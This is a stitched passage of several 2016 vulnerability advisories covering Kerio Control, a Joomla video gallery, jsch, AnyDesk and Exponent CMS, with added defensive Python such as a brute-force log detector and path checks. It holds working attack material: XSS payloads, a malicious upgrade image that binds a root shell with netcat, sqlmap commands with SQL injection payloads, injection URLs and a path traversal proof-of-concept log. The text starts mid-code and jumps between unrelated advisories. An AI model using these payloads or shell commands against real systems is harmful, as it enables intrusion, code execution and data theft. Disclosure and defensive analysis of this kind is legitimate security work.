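KERIO_TAG = '<kerio:text id="tabCaption_dialup"/>'   # breaks script execution
INJECTED = 'aa";alert(1);//'                          # the XSS payload shape

if __name__ == "__main__":
    for value in (KERIO_TAG, INJECTED):
        print("naive :", after_string_literal(naive_js_assignment("k_newDbName", value)))
        print("safe  :", after_string_literal(safe_js_assignment("k_newDbName", value)))
```

With the naive emitter the remainder after the literal is `tabCaption_dialup"/>";` for the first value (a syntax error, which is the "termination of the JavaScript execution" the advisory describes) and `;alert(1);//";` for the second (the payload runs). With the JSON emitter the remainder is `;` in both cases.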
Another XSS can be found at:
https://<IP>:4081/admin/internal/dologin.php?hash=%0D%0A"><script>alert(1);</script><!--
6) Missing memory corruption protections
No proof of concept necessary.
7) Information Disclosure leads to ASLR bypass
The following request returns information to the currently logged in user
(e.g. session token and username):
GET /nonauth/getLoginType.js.php HTTP/1.1
Host: $IP:4081
Cookie: SESSION_CONTROL_WEBIFACE=<valid session ID>;
Connection: close
The following is a typical response:
HTTP/1.1 200 OK
Connection: Close
Content-type: text/html
Date: Tue, 24 Aug 2016 11:47:34 GMT
Server: Kerio Control Embedded Web Server
X-UA-Compatible: IE=edge
k_loginParams.k_loginType = "loginUnlock";k_loginParams.k_nonauthToken =
"0xb59066a8";k_loginParams.k_sessionToken =
"bc7c9ae78f01e498b7c935b4ad521b664d4e2c5574bde30cdf57851a58763660";k_loginParams.k_loggedUser
= {k_asocName: "user", k_fullName: "user"};
The above response contains a valid pointer (0xb59066a8). In most cases this
pointer will point to the heap. However, sometimes this pointer will point
into a readable and writeable region behind a stack-region.
The target location always stores the same data. During the analysis no
further effort was spent on analysing this behaviour.
The pointer will also be disclosed if the user is already logged out.
In such a case the response looks like:
HTTP/1.1 200 OK
Connection: Close
Content-type: text/html
Date: Tue, 24 Aug 2016 12:04:44 GMT
Server: Kerio Control Embedded Web Server
X-UA-Compatible: IE=edge
k_loginParams.k_loginType = "loginCommon";k_loginParams.k_nonauthToken =
"0xb2ee208";
An attack scenario can be:
-) The attacker tricks a victim to visit the attacker's malicious website
-) The attacker's website uses the CSRF bypass and the identified XSS
vulnerability to embed a malicious script inside the Kerio Control website
-) The attacker's website iframes the Kerio Control website to trigger the
execution of the XSS payload
-) The XSS payload runs on the same domain and can therefore send requests
and read responses. This means the attacker can send requests to
getLoginType.js.php to obtain a memory pointer.
-) If the memory pointer is within a specific range (e.g. the highest nibble
is zero), it's a pointer to the heap. In such a case the RCE vulnerability
can be used to crash and restart the server. After that the same check can
be done again.
-) If the memory pointer points near a stack (highest nibble is 0xb), the
pointer can be used to calculate the base address of a stack.
-) Now the attacker knows the location of a stack (all stacks are marked as
readable, writeable and executable). He can now easily bypass ASLR and DEP.
8) Remote Code Execution as administrator
An attacker can create a malicious upgrade image with the following
commands:
cat upgrade.sh
#!/bin/bash
nc -lp 9999 -e /bin/bash &
tar czf upgrade.tar.gz *
mv upgrade.tar.gz upgrade.img
The image can be uploaded in the administrative web interface.
This will bind a root shell on port 9999. The complete attack can also be
conducted via the cross site scripting vulnerability described in this
advisory (XSS in contentLoader.php). This enables an attacker to conduct
the attack from the Internet to obtain a reverse shell on Kerio Control.
9) Login not protected against brute-force attacks
Valid credentials can be obtained via a brute-force attack.
It's enough to send a POST request to /internal/dologin.php with the
parameters kerio_username and kerio_password set. A remote attacker
can detect if the credentials are correct without reading the
response (SOP would not allow the response to be read). This is possible
because /internal/photo will only return a valid image if the user is
currently logged in. The attacker can load an image from this URL and
check whether loading was successful to learn whether the credentials
are valid or not.
The following code demonstrates this:
<img src="https://<Kerio-IP>/internal/photo" onerror=not_logged_in();
onload=logged_in();></img>
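Since the vendor answered that lockout "already is in the product" (see the timeline below) while the advisory reports none, detection falls to whoever operates the appliance. The Python below is an added example, not from the advisory: it runs a sliding-window count of POSTs to /internal/dologin.php per source address over constructed web-server log lines (the log format, addresses and timestamps are all assumptions), and records whether the same source also requested /internal/photo, the login oracle the advisory describes. Because the oracle works without reading the login response, the status code of the POST is deliberately not used to tell success from failure.

```python
"""Added example: flag login brute-force against /internal/dologin.php from
constructed combined-format log lines. Not code from the advisory or Kerio."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Dict, List, Optional

# Constructed log lines: one source fires six login POSTs in 25 seconds,
# each followed by a probe of /internal/photo; another logs in twice, 9 min apart.
SAMPLE_LOG = """\
203.0.113.7 - - [22/Sep/2016:10:00:00 +0000] "POST /internal/dologin.php HTTP/1.1" 200 512
203.0.113.7 - - [22/Sep/2016:10:00:00 +0000] "GET /internal/photo HTTP/1.1" 403 0
198.51.100.20 - - [22/Sep/2016:10:00:03 +0000] "POST /internal/dologin.php HTTP/1.1" 200 512
198.51.100.20 - - [22/Sep/2016:10:00:04 +0000] "GET /internal/photo HTTP/1.1" 200 2048
203.0.113.7 - - [22/Sep/2016:10:00:05 +0000] "POST /internal/dologin.php HTTP/1.1" 200 512
203.0.113.7 - - [22/Sep/2016:10:00:05 +0000] "GET /internal/photo HTTP/1.1" 403 0
203.0.113.7 - - [22/Sep/2016:10:00:10 +0000] "POST /internal/dologin.php HTTP/1.1" 200 512
203.0.113.7 - - [22/Sep/2016:10:00:10 +0000] "GET /internal/photo HTTP/1.1" 403 0
203.0.113.7 - - [22/Sep/2016:10:00:15 +0000] "POST /internal/dologin.php HTTP/1.1" 200 512
203.0.113.7 - - [22/Sep/2016:10:00:15 +0000] "GET /internal/photo HTTP/1.1" 403 0
203.0.113.7 - - [22/Sep/2016:10:00:20 +0000] "POST /internal/dologin.php HTTP/1.1" 200 512
203.0.113.7 - - [22/Sep/2016:10:00:20 +0000] "GET /internal/photo HTTP/1.1" 403 0
203.0.113.7 - - [22/Sep/2016:10:00:25 +0000] "POST /internal/dologin.php HTTP/1.1" 200 512
203.0.113.7 - - [22/Sep/2016:10:00:25 +0000] "GET /internal/photo HTTP/1.1" 403 0
198.51.100.20 - - [22/Sep/2016:10:09:00 +0000] "POST /internal/dologin.php HTTP/1.1" 200 512
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
LOGIN_PATH = "/internal/dologin.php"
ORACLE_PATH = "/internal/photo"


def parse_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one combined-format line; return None for lines that don't match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],
        "status": int(m.group("status")),
    }


def detect_login_bruteforce(lines: List[str], threshold: int = 5,
                            window: timedelta = timedelta(seconds=60)) -> Dict[str, Dict[str, int]]:
    """Return {ip: {"attempts": peak POSTs within `window`, "oracle_probes": n}}
    for every source that reaches `threshold` login POSTs inside the window.
    Lines are assumed to be in chronological order."""
    recent = defaultdict(deque)   # ip -> timestamps of login POSTs in the window
    peak = defaultdict(int)       # ip -> largest window count seen
    probes = defaultdict(int)     # ip -> GETs of the login oracle
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts = rec["ip"], rec["ts"]
        if rec["method"] == "GET" and rec["path"] == ORACLE_PATH:
            probes[ip] += 1
        if rec["method"] != "POST" or rec["path"] != LOGIN_PATH:
            continue
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        peak[ip] = max(peak[ip], len(q))
    return {ip: {"attempts": n, "oracle_probes": probes[ip]}
            for ip, n in peak.items() if n >= threshold}


if __name__ == "__main__":
    for ip, info in detect_login_bruteforce(SAMPLE_LOG.splitlines()).items():
        print("%s: %d login attempts in 60s, %d oracle probes" % (ip, info["attempts"], info["oracle_probes"]))
```

The interleaving of a login POST with an immediate GET of /internal/photo from the same source is the more specific signal: a browser that logged in normally requests the photo at most once, not once per credential tried.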
Vulnerable / tested versions:
-----------------------------
The following product versions were found to be vulnerable which were the
latest versions available at the time of the discovery:
v9.1.0 (Build 1087)
v9.1.1 (Build 1324)
Vendor contact timeline:
------------------------
2016-08-29: Contacting vendor through website
(bug report: bugreports@support.kerio.com) Ticket-ID: MYW-768664
2016-08-31: No answer, contacting CTO of Kerio via email
2016-09-01: Received security contact with PGP & S/MIME certificate
2016-09-01: Transmission of PGP encrypted advisory to Kerio
2016-09-09: Received answer, Kerio confirms vulnerabilities 1,2,3,5,6,7
Statement to vulnerability 9:
"the feature already is in the product."
Statement to vulnerabilities 4 (Webserver running with root
privileges) and 8 (Remote Code Execution as administrator):
"I do not consider this a vulnerability"
Update including a fix will be available on 2016-09-20
2016-09-09: SEC Consult informed Kerio to re-think the decision
not fixing the vulnerabilities 4, 8 and 9
SEC Consult highly recommends to fix all reported issues
2016-09-13: SEC Consult informed Kerio that the advisory will be
released on 2016-09-22
2016-09-20: Kerio releases patch for Kerio Control
2016-09-22: Coordinated release of security advisory
Solution:
---------
The vendor has released version 9.1.3 on 20th September which, according
to the vendor, fixes the vulnerabilities 1,2,3,5,6,7.
The vendor told us the following regarding vulnerability 9:
"the feature already is in the product"
Vulnerability 4 and 8 are not considered a vulnerability by the vendor
and will not be fixed.
SEC Consult strongly recommended fixing issues 4 and 8 as well.
The latest version can be downloaded from here:
http://www.kerio.com/support/kerio-control
http://www.kerio.com/support/kerio-control/release-history
Workaround:
-----------
None
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF R. Freingruber / @2016
Title: Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-15
Download Site: http://huge-it.com/joomla-video-gallery/
Vendor: www.huge-it.com, fixed v1.1.0
Vendor Notified: 2016-09-17
Vendor Contact: info@huge-it.com
Description: A video slideshow gallery.
Vulnerability:
The following code does not prevent an unauthenticated user from injecting SQL into functions located in ajax_url.php.
Vulnerable Code in : ajax_url.php (lines 11-12 and 28-56)
define('_JEXEC',1);
defined('_JEXEC') or die('Restircted access');
.
.
.
if($_POST['task']=="load_videos_content"){

    $page = 1;


    if(!empty($_POST["page"]) && is_numeric($_POST['page']) && $_POST['page']>0){
        $paramssld='';
        $db5 = JFactory::getDBO();
        $query5 = $db->getQuery(true);
        $query5->select('*');
        $query5->from('#__huge_it_videogallery_params');
        $db->setQuery($query5);
        $options_params = $db5->loadObjectList();
        foreach ($options_params as $rowpar) {
            $key = $rowpar->name;
            $value = $rowpar->value;
            $paramssld[$key] = $value;
        }
        $page = $_POST["page"];
        $num=$_POST['perpage'];
        $start = $page * $num - $num;
        $idofgallery=$_POST['galleryid'];

        $query = $db->getQuery(true);
        $query->select('*');
        $query->from('#__huge_it_videogallery_videos');
        $query->where('videogallery_id ='.$idofgallery);
        $query ->order('#__huge_it_videogallery_videos.ordering asc');
        $db->setQuery($query,$start,$num);
CVE-2016-1000123
Exploit Code:
$ sqlmap -u 'http://server/components/com_videogallerylite/ajax_url.php' --data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2" --level=5 --risk=3
.
.
.
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: page=1&galleryid=-3390 OR 1 GROUP BY CONCAT(0x716b766271,(SELECT (CASE WHEN (2575=2575) THEN 1 ELSE 0 END)),0x7170767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&task=load_videos_content&perpage=20&linkbutton=2

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: page=1&galleryid=(CASE WHEN (5952=5952) THEN SLEEP(5) ELSE 5952 END)&task=load_videos_content&perpage=20&linkbutton=2
---
[19:36:55] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
[19:36:55] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2714 times
[19:36:55] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4'

[*] shutting down at 19:36:55
Advisory: http://www.vapidlabs.com/advisory.php?v=169
Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-5725
Version: 0.3
Date: Aug 31st, 2016
Complete Proof of Concept:
https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-5725
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40411.zip
Tag: jsch recursive sftp get client-side windows path traversal
Overview
--------
Name: jsch
Vendor: jcraft
References: * http://www.jcraft.com/jsch/ [1]
Version: 0.1.53 [2]
Latest Version: 0.1.54 [2]
Other Versions: <= 0.1.53
Platform(s): windows
Technology: java
Vuln Classes: CWE-22 Improper Limitation of a Pathname to a Restricted
Directory ('Path Traversal')
Origin: remote
Min. Privs.: post auth
CVE: CVE-2016-5725
Description
---------
Quoted from the website [1]:
> JSch is a pure Java implementation of SSH2. JSch allows you to connect
to an sshd server and use port forwarding, X11 forwarding, file transfer,
etc., and you can integrate its functionality into your own Java programs.
JSch is licensed under BSD style license.
We have recognized that the following applications have used JSch.
* Ant(1.6 or later).
JSch has been used for Ant's sshexec and scp tasks.
* Eclipse(3.0).
Our Eclipse-CVSSSH2 plug-in has been included in Eclipse SDK 3.0.
This plug-in will allow you to get ssh2 accesses to remote CVS
repository
by JSch.
* NetBeans 5.0(and later)
* Jakarta Commons VFS
* Maven Wagon
* Rational Application Developer for WebSphere Software
* HP Storage Essentials
* JIRA
* Trac WikiOutputStreamPlugin
Summary
-------
A malicious sftp server may force a client-side relative path traversal in
jsch's implementation for recursive sftp-get allowing the server to write
files outside the clients download basedir with effective permissions of the
jsch sftp client process.
* affects recursive get, i.e. sftp <host>:</path>/* .
* post-auth
* file overwrite capability depends on the client specified mode:
`ChannelSftp.get(...,mode==ChannelSftp.OVERWRITE)`
* windows only
see attached PoC
Details
-------
* examples/Sftp.java::main::
c.get(p1, p2, monitor, mode);
* ChannelSftp.java::get(String src, String dst,
SftpProgressMonitor monitor, int mode)
* ChannelSftp.java::_get(src,dst,monitor,mode,skip)
Source
------
see ref github.
Proof of Concept
----------------
see ref github.
poc:
1. run `poc.py` to spawn the ssh/sftp stub listening for new connections
on `0.0.0.0:3373`:
poc.py --host=0.0.0.0 --port=3373 -l DEBUG -k test_rsa.key
INFO:__main__:[cve-2016-5725] sftp server starting...
INFO:__main__:* generating fake files
INFO:__main__:** /..\..\totally_malicious_script
INFO:__main__:* setting up sftp server
INFO:__main__:* monkey patching: chattr
INFO:__main__:* monkey patching: list_folder
INFO:__main__:* monkey patching: mkdir
INFO:__main__:* monkey patching: open
INFO:__main__:* monkey patching: remove
INFO:__main__:* monkey patching: rename
INFO:__main__:* monkey patching: rmdir
INFO:__main__:* monkey patching: stat
INFO:__main__:* monkey patching: symlink
INFO:__main__:* starting sftp server...
0.0.0.0 3373
2. connect to `poc.py` using jsch sftp-client example `examples/Sftp.java`
(any user, user password):
sftp>
3. issue a recursive get (any remote folder will do for the PoC) to store
all files from `remote:fancyfolder` to `.`.
Note: output may contain additional debug information not enabled by default
in `examples/Sftp.java`
Note: pwd is `<path>\workspace-ee\jsch`
Note: local output folder is `.` (`<path>\workspace-ee\jsch`)
sftp> get fancyfolder/* .
3. client connects to `poc.py` with subsystem sftp
DEBUG:paramiko.transport:starting thread (server mode): 0x350afd0L
DEBUG:paramiko.transport:Local version/idstring: SSH-2.0-paramiko_2.0.0
DEBUG:paramiko.transport:Remote version/idstring: SSH-2.0-JSCH-0.1.53
INFO:paramiko.transport:Connected (version 2.0, client JSCH-0.1.53)
DEBUG:paramiko.transport:kex algos:[u'ecdh-sha2-nistp256', ...
DEBUG:paramiko.transport:Kex agreed: diffie-hellman-group1-sha1
DEBUG:paramiko.transport:Cipher agreed: aes128-ctr
DEBUG:paramiko.transport:MAC agreed: hmac-md5
DEBUG:paramiko.transport:Compression agreed: none
DEBUG:paramiko.transport:kex engine KexGroup1 specified hash_algo ...
DEBUG:paramiko.transport:Switch to new keys ...
DEBUG:paramiko.transport:Auth request (type=none) ...
INFO:paramiko.transport:Auth rejected (none).
DEBUG:paramiko.transport:Auth request (type=password) ...
INFO:paramiko.transport:Auth granted (password).
DEBUG:paramiko.transport:[chan 0] Max packet in: 32768 bytes
DEBUG:paramiko.transport:[chan 0] Max packet out: 32768 bytes
DEBUG:paramiko.transport:Secsh channel 0 (session) opened.
DEBUG:paramiko.transport:Starting handler for subsystem sftp
4. jsch sftp-client command `get fancyfolder/* .` calls
`opendir(/fancyfolder)`
on the PoC sftp server which responds with a fake filelist for
`fancyfolder`
listing the file `/..\..\totally_malicious_script`.
DEBUG:paramiko.transport.sftp:[chan 0] Started sftp server on channel
<paramiko.Channel 0 (open) window=2097152 -> <paramiko.Transport
at 0x350afd0L (cipher aes128-ctr, 128 bits) (active; 1 open
channel(s))>> DEBUG:paramiko.transport.sftp:[chan 0] Request: realpath
DEBUG:paramiko.transport.sftp:[chan 0] Request: opendir INFO:__main__:LIST
(u'/fancyfolder'): [<SFTPAttributes: [ size=44 uid=0
gid=9 mode=0100666 atime=1472758892 mtime=1472758897 ]>]
DEBUG:paramiko.transport.sftp:[chan 0] Request: readdir
DEBUG:paramiko.transport.sftp:[chan 0] Request: readdir
DEBUG:paramiko.transport.sftp:[chan 0] Request: close
5. jsch sftp-client recursively downloads the files listed in the response
to `opendir(/fancyfolder)` (sftp-get) by
calling `stat`, `open` and `read` on the file.
a) jsch sftp-client calls `stat` on the filename as returned by the server's
response to `opendir` (with traversal):
`stat(/fancyfolder//..\\..\\totally_malicious_script)`
b) the sftp-server (PoC) returns file attributes for
`totally_malicious_script`
(with traversal)
c) jsch sftp-client requests file `open` on the path (with traversal):
`open(/fancyfolder//..\..\totally_malicious_script)`
d) jsch sftp-client builds destination path by concatenating the destination
folder ( `<path>\workspace-ee\jsch\.` ) with the server provided filename
`/..\..\totally_malicious_script` stripping any data before and including
`/` of the filename, then receives the remote file's contents: `
<path>\workspace-ee\jsch\.\..\..\totally_malicious_script`
e) the resulting sftp-client local destination path
`dst <path>\workspace-ee\jsch\.\..\..\totally_malicious_script` is outside
the basedir `<path>\workspace-ee\jsch\.`
sftp-server (PoC)
DEBUG:paramiko.transport.sftp:[chan 0] Request: stat INFO:__main__:STAT
(u'/fancyfolder//..\\..\\totally_malicious_script')
INFO:__main__:STAT - returning: totally_malicious_script
INFO:__main__:** /..\..\totally_malicious_script
DEBUG:paramiko.transport.sftp:[chan 0] Request: open
INFO:__main__:OPEN: /fancyfolder//..\..\totally_malicious_script
DEBUG:paramiko.transport.sftp:[chan 0] Request: read
DEBUG:paramiko.transport.sftp:[chan 0] Request: read
DEBUG:paramiko.transport.sftp:[chan 0] Request: read
DEBUG:paramiko.transport.sftp:[chan 0] Request: close
sftp-client (jsch)
dst <path>\workspace-ee\jsch\.\..\..\totally_malicious_script
_get: /fancyfolder//..\..\totally_malicious_script,
java.io.FileOutputStream@7ccf3329
sftp>
6. downloaded file is stored in server controlled relative path on client
tintin@testbox ~<path>/workspace-ee/jsch $ ls ../../total*
../../totally_malicious_script
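The destination-path logic of step 5 d) and e), modelled in Python as an added example (it is neither jsch's code nor the advisory's PoC). It uses ntpath so the Windows resolution runs identically on any host; DOWNLOAD_DIR and the directory listing are constructed values mirroring the advisory, and the hardened variant is one way to close the hole, not the vendor's fix.

```python
"""Model of the jsch recursive-get destination bug (CVE-2016-5725) with
Windows path semantics, plus a hardened replacement check."""
import ntpath      # Windows path rules, regardless of the host OS
import posixpath   # SFTP names are '/'-separated on the wire

# Assumed local download dir, mirroring the advisory's `get fancyfolder/* .`
DOWNLOAD_DIR = r"C:\workspace-ee\jsch\."

# Constructed listing, as a malicious server could answer opendir()
SERVER_LISTING = [
    "track01.mp3",                          # benign name
    "/..\\..\\totally_malicious_script",    # the advisory's backslash traversal
    "../../forward_slash_attempt",          # '/'-based traversal
    "C:\\absolute\\path.txt",               # drive-qualified absolute path
]


def jsch_style_destination(download_dir, remote_name):
    """Reproduce the flawed step 5 d): keep whatever follows the last '/' of
    the server-supplied name and append it to the download directory."""
    leaf = remote_name[remote_name.rfind("/") + 1:]
    return ntpath.join(download_dir, leaf)


def is_within(download_dir, candidate):
    """True only if `candidate`, resolved with Windows rules, stays inside
    `download_dir`. Both must be absolute."""
    base = ntpath.normcase(ntpath.normpath(download_dir))
    cand = ntpath.normcase(ntpath.normpath(candidate))
    try:
        return ntpath.commonpath([base, cand]) == base
    except ValueError:  # different drives: certainly outside
        return False


def hardened_destination(download_dir, remote_name):
    """Accept only a bare file name (no '/', no '\\', no drive, no dot-dirs),
    then re-check containment of the joined result."""
    if remote_name != posixpath.basename(remote_name):
        raise ValueError(f"server sent a path, not a file name: {remote_name!r}")
    if "\\" in remote_name or ntpath.splitdrive(remote_name)[0]:
        raise ValueError(f"Windows separator or drive in name: {remote_name!r}")
    if remote_name in ("", ".", ".."):
        raise ValueError(f"dot-directory name: {remote_name!r}")
    dest = ntpath.join(download_dir, remote_name)
    if not is_within(download_dir, dest):
        raise ValueError(f"resolved outside download dir: {dest!r}")
    return dest


def audit_listing(download_dir, names):
    """For each server-supplied name: where the flawed logic would write,
    whether that escapes the download dir, and whether the hardened check
    accepts the name."""
    report = {}
    for name in names:
        flawed = jsch_style_destination(download_dir, name)
        try:
            hardened_destination(download_dir, name)
            accepted = True
        except ValueError:
            accepted = False
        report[name] = {
            "flawed_dst": flawed,
            "escapes": not is_within(download_dir, flawed),
            "hardened_accepts": accepted,
        }
    return report


if __name__ == "__main__":
    for name, r in audit_listing(DOWNLOAD_DIR, SERVER_LISTING).items():
        print(f"{name!r:40} -> {r['flawed_dst']}  escapes={r['escapes']}  "
              f"hardened_accepts={r['hardened_accepts']}")
```

The '/'-based name is handled by the original stripping logic and only the backslash form escapes, which is why the advisory marks the issue as Windows only.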
Notes
-----
* the PoC is a slightly modified version of `stub_sftp.py` shipped with
paramiko/tests [4].
* we've seen ssh bots in the wild using jsch probing for weak ssh passwords.
Vendor response: see [5]
References
----------
[1] http://www.jcraft.com/jsch/
[2] https://sourceforge.net/projects/jsch/files/?source=navbar
[3] https://sourceforge.net/projects/jsch/files/jsch/0.1.53
[4] https://github.com/paramiko/paramiko/blob/master/tests/stub_sftp.py
[5] http://www.jcraft.com/jsch/ChangeLog
# Exploit Title: AnyDesk 2.5.0 Unquoted Service Path Elevation of Privilege
# Date: 22/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: http://anydesk.com
# Software Link: http://anydesk.com/download
# Version: Software Version 2.5.0
# Tested on: Windows 10 Professional x64, Windows XP SP3 x86, Windows Server 2008 R2 x64
# Shout-out to carbonated and ozzie_offsec
1. Description:
AnyDesk installs as a service with an unquoted service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.
2. Proof
C:\>sc qc anydesk
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: anydesk
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\AnyDesk\AnyDesk.exe --service
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : AnyDesk Service
DEPENDENCIES : RpcSs
SERVICE_START_NAME : LocalSystem
3. Exploit:
A successful attempt would require the local user to be able to insert their
code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
If successful, the local user's code would execute with the elevated privileges
of the application.
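A defender-side audit of the `sc qc` output above, written as an added example that is not part of the advisory: it parses the block, flags the unquoted path with spaces, lists the parent-directory prefixes whose ACLs must be verified, and produces the quoted form that remediates the finding. The sample text is constructed from the advisory's listing.

```python
"""Parse `sc qc` output and flag unquoted service binary paths."""
import re

# Constructed sample mirroring the advisory's `sc qc anydesk` output
SC_QC_OUTPUT = """\
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: anydesk
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\\Program Files\\AnyDesk\\AnyDesk.exe --service
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : AnyDesk Service
        DEPENDENCIES       : RpcSs
        SERVICE_START_NAME : LocalSystem
"""

FIELD_RE = re.compile(r"^\s*([A-Z_]+)\s*:\s?(.*)$")


def parse_sc_qc(text):
    """Return the KEY : value fields of one `sc qc` block as a dict."""
    fields = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def executable_part(binary_path):
    """Split BINARY_PATH_NAME into (exe_path, quoted). The exe path ends at
    the closing quote when quoted, else at the first '.exe'."""
    p = binary_path.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        return (p[1:end] if end > 0 else p[1:]), True
    m = re.search(r"\.exe", p, re.IGNORECASE)
    return (p[:m.end()] if m else p.split(" ")[0]), False


def is_unquoted_with_spaces(binary_path):
    """True when the executable path is unquoted and contains a space, the
    condition under which Windows may resolve it ambiguously."""
    exe, quoted = executable_part(binary_path)
    return (not quoted) and (" " in exe)


def ambiguous_prefixes(binary_path):
    """Paths Windows may try before the intended executable: each prefix of
    the unquoted path cut at a space, with '.exe' appended (CreateProcess
    documented behaviour). Verify the ACLs of these parent directories."""
    exe, quoted = executable_part(binary_path)
    if quoted or " " not in exe:
        return []
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def quoted_binary_path(binary_path):
    """Remediated form: quote the executable part, keep the arguments."""
    exe, quoted = executable_part(binary_path)
    if quoted:
        return binary_path.strip()
    args = binary_path.strip()[len(exe):]
    return f'"{exe}"{args}'


def audit_service(text):
    """Summarise one `sc qc` block into a finding dict."""
    f = parse_sc_qc(text)
    path = f.get("BINARY_PATH_NAME", "")
    return {
        "service": f.get("SERVICE_NAME"),
        "runs_as": f.get("SERVICE_START_NAME"),
        "auto_start": f.get("START_TYPE", "").endswith("AUTO_START"),
        "unquoted_with_spaces": is_unquoted_with_spaces(path),
        "ambiguous_prefixes": ambiguous_prefixes(path),
        "remediated_path": quoted_binary_path(path),
    }


if __name__ == "__main__":
    for k, v in audit_service(SC_QC_OUTPUT).items():
        print(f"{k:22}: {v}")
```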
=============================================
MGC ALERT 2016-005
- Original release date: September 09, 2016
- Last revised: September 20, 2016
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
- CVE-ID: CVE-2016-7400
=============================================
I. VULNERABILITY
-------------------------
Blind SQL Injection in Exponent CMS <= v2.3.9
II. BACKGROUND
-------------------------
Exponent CMS is a free, open source, open standards modular enterprise
software framework and content management system (CMS) written in the
programming language PHP.
III. DESCRIPTION
-------------------------
This bug was found using the portal in the index.php page.
To exploit the vulnerability it is only necessary to use version 1.0 of the
HTTP protocol to interact with the application.
It is possible to inject SQL code in the "index.php" page
"/exponent/index.php".
IV. PROOF OF CONCEPT
-------------------------
The following URLs have been confirmed to suffer from Blind SQL
Injection and Time Based SQL Injection.
Blind SQL Injection POC:
/exponent/index.php'%20or%201%3d1--%20
/exponent/index.php'%20or%201%3d2--%20
Time Based SQL Injection POC:
/exponent/index.php'%20OR%20SLEEP(1)--%20 (2 seconds of response)
/exponent/index.php'%20OR%20SLEEP(30)--%20 (30 seconds of response)
V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.
VI. SYSTEMS AFFECTED
-------------------------
Exponent CMS <= v2.3.9
VII. SOLUTION
-------------------------
Vendor fix for the vulnerability:
http://www.exponentcms.org/news/updated-patches-released-for-v2-1-4-and-v2-2-3-1473726129-0.50310400
VIII. REFERENCES
-------------------------
http://www.exponentcms.org/
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
X. REVISION HISTORY
-------------------------
September 09, 2016 1: Initial release
September 20, 2016 2: Revision to send to lists
XI. DISCLOSURE TIMELINE
-------------------------
September 09, 2016 1: Vulnerability acquired by Manuel Garcia Cardenas
September 09, 2016 2: Send to vendor
September 12, 2016 3: Vendor fixes vulnerability
